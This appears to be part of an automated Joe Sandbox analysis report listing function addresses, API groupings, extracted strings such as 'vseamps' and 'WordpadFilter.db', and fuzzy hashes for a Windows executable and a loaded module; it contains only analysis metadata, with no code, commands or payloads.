                                                                              Function 00007FFE1A521720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                                                              • String ID: WordpadFilter.db
                                                                              • API String ID: 868324331-3647581008
                                                                              • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                                              • Instruction ID: 4d6d6e1e264b8d98143f22df4483945add94b7107acdd031bdb96ed5c68d3ce1
                                                                              • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                                              • Instruction Fuzzy Hash: 4A315932B19F41C9E700CBA2E8402AE73B6FB99B98F1545B6EE4D13B54EE38D156C740
                                                                              Function 00007FFE1A5211B0 Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 196 7ffe1a5211b0-7ffe1a521207 197 7ffe1a521209-7ffe1a521222 call 7ffe1a531490 196->197 198 7ffe1a52124b-7ffe1a52124e 196->198 210 7ffe1a52123e 197->210 211 7ffe1a521224-7ffe1a521227 197->211 199 7ffe1a521254-7ffe1a521280 198->199 200 7ffe1a5214b8-7ffe1a5214bf 198->200 202 7ffe1a521282-7ffe1a52128f 199->202 203 7ffe1a5212f6-7ffe1a521335 call 7ffe1a521b90 call 7ffe1a530a50 199->203 204 7ffe1a5214c3-7ffe1a5214ea call 7ffe1a521b70 200->204 207 7ffe1a5214f1-7ffe1a5214f6 call 7ffe1a521a40 202->207 208 7ffe1a521295-7ffe1a52129c 202->208 232 7ffe1a521340-7ffe1a5213cb 203->232 222 7ffe1a5214f7-7ffe1a5214ff call 7ffe1a521110 207->222 216 7ffe1a52129e-7ffe1a5212a5 208->216 217 7ffe1a5212c7-7ffe1a5212cf call 7ffe1a521b90 208->217 212 7ffe1a521241-7ffe1a521246 210->212 211->212 213 7ffe1a521229-7ffe1a52123c call 7ffe1a531490 211->213 212->198 213->210 213->211 216->222 223 7ffe1a5212ab-7ffe1a5212b3 call 7ffe1a521b90 216->223 230 7ffe1a5212d2-7ffe1a5212f1 call 7ffe1a530e10 217->230 236 7ffe1a5212b9-7ffe1a5212c5 223->236 237 7ffe1a5214eb-7ffe1a5214f0 call 7ffe1a5279cc 223->237 230->203 232->232 235 7ffe1a5213d1-7ffe1a5213da 232->235 239 7ffe1a5213e0-7ffe1a521402 235->239 236->230 237->207 242 7ffe1a521411-7ffe1a52142c 239->242 243 7ffe1a521404-7ffe1a52140e 239->243 242->239 244 7ffe1a52142e-7ffe1a521436 242->244 243->242 245 7ffe1a521498-7ffe1a5214a6 244->245 246 7ffe1a521438-7ffe1a52143b 244->246 248 7ffe1a5214b6 245->248 249 7ffe1a5214a8-7ffe1a5214b5 call 7ffe1a521bcc 245->249 247 7ffe1a521440-7ffe1a521449 246->247 250 7ffe1a521455-7ffe1a521465 247->250 251 7ffe1a52144b-7ffe1a521453 247->251 248->204 249->248 253 7ffe1a521470-7ffe1a521496 250->253 254 7ffe1a521467-7ffe1a52146e 250->254 251->250 253->245 253->247 254->253
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 73155330-0
                                                                              • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                                              • Instruction ID: cd66a004daeb856ad0fab345d67b68d6a9b00a88d8168a93585ef8955ff3169b
                                                                              • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                                              • Instruction Fuzzy Hash: 8A812736B1DB8285E6118B76940017AB694FF57FE4F148377EA5D537A2DF3CA0918300

                                                                              Non-executed Functions

                                                                              Function 0000000140001A30 Relevance: 37.9, APIs: 30, Instructions: 422memorystringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                                                              • String ID:
                                                                              • API String ID: 3526400053-0
                                                                              • Opcode ID: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                                              • Instruction ID: dcb8fc7c666fd7128fde866f0540a8def7dae1288ec2bbf322971b46f3f62141
                                                                              • Opcode Fuzzy Hash: 2d7440e75e10ea9e081ba84afc5c3468ce3eac85d6796ce4805a157c9b29c232
                                                                              • Instruction Fuzzy Hash: E3220F76211B4086E722DF26F840B9933A1F78CBE5F541226EB5A8B7B4DF3AC585C740
                                                                              Function 0000000140003F80 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 160timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSectionServer$CreateErrorLastProcessTimerTokenWaitable$AdjustCloseContextCurrentDontEnterEventHandleInitializeLeaveListenLookupOpenPrivilegePrivilegesProtseqRegisterSerializeValueVersion
                                                                              • String ID: SeLoadDriverPrivilege$ampStartSingletone: logging started, settins=%s$null
                                                                              • API String ID: 3408796845-4213300970
                                                                              • Opcode ID: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                                              • Instruction ID: 59d58333609de1a5812b0fd1fbb73637b4596d8d749a2627428b03e5fdfefd81
                                                                              • Opcode Fuzzy Hash: 126decfa78297cd7188aa212e183f7007b74f13d5c024852e8adcc4be0567069
                                                                              • Instruction Fuzzy Hash: B19104B1224A4182EB12CF22F854BC633A5F78C7D4F445229FB9A4B6B4DF7AC159CB44
                                                                              Function 00000001400042B0 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 59synchronizationtimethreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveServer$CancelEventListeningMgmtObjectSingleStopTerminateThreadTimerUnregisterWaitWaitable
                                                                              • String ID: ampStopSingletone: logging ended
                                                                              • API String ID: 2048888615-3533855269
                                                                              • Opcode ID: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                                              • Instruction ID: 72436faa0f880f3f140bbf81e9e476d17cd4b789f208762ad84a5967a0be411a
                                                                              • Opcode Fuzzy Hash: 304760f1fd88bc3c97c02eb8ad6caf2cea0e78157ea711a11ae6bb1ec958ebce
                                                                              • Instruction Fuzzy Hash: 85315178221A0192EB17DF27EC94BD82361E79CBE1F455111FB0A4B2B1CF7AC5898744
                                                                              Function 000000014000C3F0 Relevance: 29.0, APIs: 19, Instructions: 515COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                                              • Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
                                                                              • Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
                                                                              • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                                                              Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastManagerOpen$FileModuleName
                                                                              • String ID: /remove$/service$vseamps
                                                                              • API String ID: 67513587-3839141145
                                                                              • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                                              • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                                                              • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                                              • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                                                              Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                                                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                                                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                                                              • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                                                              • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                                                              • GetProcAddress.KERNEL32 ref: 000000014000F117
                                                                                • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$Load$Library
                                                                              • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                              • API String ID: 3981747205-232180764
                                                                              • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                                              • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                                                              • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                                              • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                                                              Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                                                              • String ID:
                                                                              • API String ID: 4284112124-0
                                                                              • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                                              • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                                                              • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                                              • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                                                              Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                                                              • String ID: vseamps
                                                                              • API String ID: 3693165506-3944098904
                                                                              • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                                              • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                                                              • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                                              • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                                                              Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: FileModuleName
                                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                              • API String ID: 514040917-4022980321
                                                                              • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                                              • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                                                              • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                                              • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                                                              Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                                                              • String ID:
                                                                              • API String ID: 2057259594-0
                                                                              • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                                              • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                                                              • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                                              • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                                                              Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                                                              • String ID:
                                                                              • API String ID: 3103264659-0
                                                                              • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                                              • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                                                              • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                                              • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                                                              Function 00007FFE1A522630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                              • String ID:
                                                                              • API String ID: 3140674995-0
                                                                              • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                                              • Instruction ID: fc281f1085267cc5fb239afe7a30e2e728ab5dd3696faa282b322ba00db60b50
                                                                              • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                                              • Instruction Fuzzy Hash: 1A313976709F818AEB608F61E8803FD6361FB95B94F4440BADA4E47BA4EF38D548C710
                                                                              Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                              • String ID:
                                                                              • API String ID: 1269745586-0
                                                                              • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                                              • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                                                              • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                                              • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                                                              Function 00007FFE1A5276E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                              • String ID:
                                                                              • API String ID: 1239891234-0
                                                                              • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                                              • Instruction ID: 4e356181fd72b215c4a2802df1f7af789955a1514efd47d4cd5521499a927c6a
                                                                              • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                                              • Instruction Fuzzy Hash: 8F316036708F8186DB60CB66E8402BE33A1FB85BA4F5401B7EA8D43B65EF38D145CB00
                                                                              Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                              • String ID:
                                                                              • API String ID: 1445889803-0
